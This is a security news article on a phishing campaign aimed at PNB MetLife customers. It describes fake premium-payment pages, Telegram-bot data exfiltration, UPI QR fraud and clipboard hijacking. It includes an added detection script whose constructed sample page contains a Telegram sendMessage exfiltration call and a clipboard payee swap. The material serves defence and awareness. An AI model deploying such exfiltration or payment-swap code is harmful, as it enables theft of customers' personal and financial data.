A sophisticated phishing campaign is targeting PNB MetLife insurance customers, luring them into fake payment gateway pages that steal personal details and redirect them to fraudulent UPI transactions. The scam cleverly exploits the trusted reputation of PNB MetLife by creating convincing mobile-optimized portals that mimic legitimate premium payment services. These malicious pages accept policy numbers and customer details with no backend validation, immediately forwarding captured data to attackers via automated channels. The operation, identified by security researcher Anurag Gawande during threat-hunting activities, signifies an evolution in financial fraud tactics, moving beyond simple credential theft to multi-stage operations involving data exfiltration and payment manipulation.
The phishing operation spreads primarily through SMS messages, though email and social media platforms are also potential distribution channels. Victims are directed to professionally designed interfaces that request basic information such as name, policy number, and mobile number. The defining trait of these fake pages is their deliberate lack of backend verification: any value entered is accepted, which preserves the illusion of legitimacy while drawing victims further into the fraudulent payment flow. Attackers deploy these pages rapidly across free hosting platforms, particularly EdgeOne Pages, which allows quick deployment and rotation of malicious sites.
Stealthy Data Theft Through Telegram Infrastructure
Beneath the seemingly legitimate facade, a sophisticated data exfiltration mechanism operates, powered by the Telegram Bot API. Once victims submit their information, the phishing page silently transmits the captured details directly to attacker-controlled Telegram channels. This real-time data theft occurs invisibly, with hardcoded bot tokens and chat IDs embedded within the page’s JavaScript code. Investigations into the phishing infrastructure revealed multiple Telegram bots and operator accounts coordinating the fraudulent activities. Bots like “pnbmetlifesbot” and “goldenxspy_bot” are used to collect victim submissions, while accounts such as “darkdevil_pnb” and “prabhatspy” are used to monitor and receive the stolen information. The compromised data includes names, policy numbers, and mobile numbers, all transmitted instantly as victims complete each form field.
Following the initial data capture, the phishing page prompts victims to enter payment amounts without any policy validation. Any entered value is accepted before being forwarded to the same Telegram channels. The phishing flow then introduces a sense of urgency through countdown timers and the display of QR codes, pressuring victims to complete UPI payments quickly. The JavaScript dynamically generates UPI payment URIs, rendering them as scannable QR codes that direct funds to attacker-controlled accounts. A particularly concerning tactic involves clipboard abuse. When victims click on payment app buttons like PhonePe or Paytm, the fraudulent UPI ID is silently copied to the device’s clipboard before redirecting to the legitimate payment app. This ensures the attacker’s payment details are ready to be pasted, even if victims bypass the QR code.
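The three client-side traits described above (a Telegram Bot API endpoint with the bot token and chat ID hardcoded in the page's JavaScript, a dynamically built upi://pay URI, and a clipboard write wired to the payment-app buttons) are all visible in the page source, which makes them suitable for a static indicator scan. The script below is an added example written from a detection standpoint; it is not code from the article, from PNB MetLife, or from the researcher's analysis. The regexes, scoring thresholds, and both sample pages are constructed for illustration, and the bot token and payee VPA in the sample are placeholders, not real values.

```python
"""Static scan of a web page for the phishing-kit traits the article describes:
Telegram Bot API exfiltration with a hardcoded bot token and chat ID, dynamically
built UPI payment URIs, and clipboard writes on payment-app buttons.
Added example; all patterns, thresholds and sample pages are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Indicator patterns (constructed from the article's description; tune before use).
TELEGRAM_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot([0-9]{8,10}:[A-Za-z0-9_-]{35})/(\w+)")
BOT_TOKEN_RE = re.compile(r"[0-9]{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*['\"]?(-?[0-9]{6,})")
UPI_URI_RE = re.compile(r"upi://pay\?[^\s\"'<>]+")
CLIPBOARD_RE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|document\.execCommand\s*\(\s*['\"]copy['\"]\s*\)")


def scan_page(source: str) -> dict:
    """Return the indicators found in one page's HTML/JavaScript source."""
    upi_payees = []
    for uri in UPI_URI_RE.findall(source):
        # The 'pa' parameter of a upi://pay URI is the payee VPA that receives the funds.
        upi_payees.extend(parse_qs(urlsplit(uri).query).get("pa", []))
    return {
        "telegram_endpoints": TELEGRAM_API_RE.findall(source),  # (token, method) pairs
        "bot_tokens": sorted(set(BOT_TOKEN_RE.findall(source))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(source))),
        "upi_payees": sorted(set(upi_payees)),
        "clipboard_writes": len(CLIPBOARD_RE.findall(source)),
    }


def assess(findings: dict) -> tuple:
    """Weight the indicators into a score and a verdict (weights are constructed)."""
    score = 0
    if findings["telegram_endpoints"] or findings["bot_tokens"]:
        score += 3  # exfiltration channel hardcoded client-side
    if findings["chat_ids"]:
        score += 1
    if findings["upi_payees"]:
        score += 2  # page builds its own payment URI
    if findings["clipboard_writes"]:
        score += 2  # clipboard write around payment buttons
    if score >= 5:
        verdict = "likely phishing kit"
    elif score >= 2:
        verdict = "review"
    else:
        verdict = "clean"
    return score, verdict


# CONSTRUCTED sample page: token, chat ID and payee VPA are placeholders, not real.
SAMPLE_PAGE = """
<html><body>
<form id="pay"><input name="policy"><input name="mobile"><input name="amount"></form>
<script>
function exfil(text) {
  fetch("https://api.telegram.org/bot123456789:AAEXAMPLEPLACEHOLDERTOKENNOTREAL000/sendMessage?chat_id=1000000001&text=" + encodeURIComponent(text));
}
const PAYEE = "example-payee@upi";
const uri = "upi://pay?pa=example-payee@upi&pn=PNB%20MetLife&am=" + amount;
document.getElementById("phonepe").onclick = () => navigator.clipboard.writeText(PAYEE);
</script></body></html>
"""

# CONSTRUCTED benign page with none of the indicators.
BENIGN_PAGE = "<html><script>document.title = 'Premium payment';</script></html>"

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        findings = scan_page(page)
        print(name, assess(findings), findings)
```

Run over a crawled page or a URL-scan artifact, the scan gives a triage signal rather than a verdict: a legitimate payment page may legitimately build a upi://pay URI, so the combination with a client-side Telegram endpoint is what lifts the score, and the extracted payee VPA and chat ID are the values worth pivoting on across other hosts.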
Advanced variants of this phishing campaign escalate beyond simple payment fraud to encompass comprehensive banking credential harvesting. These sophisticated templates offer multiple deceptive options, such as “Update Amount,” “Refund Your Amount,” and “Add AutoDebit System,” further solidifying the illusion of legitimate policy servicing. When victims select these options, they are eventually led to pages requesting complete bank account details and debit card information, including card numbers, expiry dates, and CVV codes. All financial credentials submitted through these deceptive pages are exfiltrated via the same Telegram infrastructure, transforming the operation from mere payment fraud into full-scale identity and financial data theft.
The continued proliferation of such sophisticated phishing attacks highlights the persistent threat to consumers engaging in online financial transactions. PNB MetLife, like many financial institutions, likely engages in ongoing efforts to educate its customers about such risks and enhance its own security measures. However, the onus remains on consumers to remain vigilant, scrutinizing URLs carefully and avoiding unsolicited payment requests, especially those originating from SMS or untrusted communication channels. The reliance on legitimate UPI apps as a final step in the fraudulent transaction chain makes detection difficult, underscoring the need for enhanced user awareness and potentially improved fraud detection mechanisms within UPI platforms themselves.